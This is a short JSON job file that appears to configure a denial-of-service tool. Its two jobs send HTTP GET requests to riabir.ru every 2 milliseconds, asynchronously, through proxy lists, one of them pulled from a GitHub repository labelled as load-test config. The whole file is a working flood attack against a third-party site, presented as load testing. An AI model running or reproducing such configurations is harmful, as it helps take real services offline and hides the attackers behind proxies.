{
  "jobs": [
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "http://riabir.ru:443/",
        "interval_ms": 2,
        "client": {
          "async": true,
          "proxy_urls": "{{ get_proxylist_by_url 'https://raw.githubusercontent.com/arfgdev/LoadTestConfig/main/proxylist.json' }}"
        }
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "http://riabir.ru:443/",
        "interval_ms": 2,
        "client": {
          "async": true,
          "proxy_urls": "{{ get_proxylist }}"
        }
      }
    }
  ]
}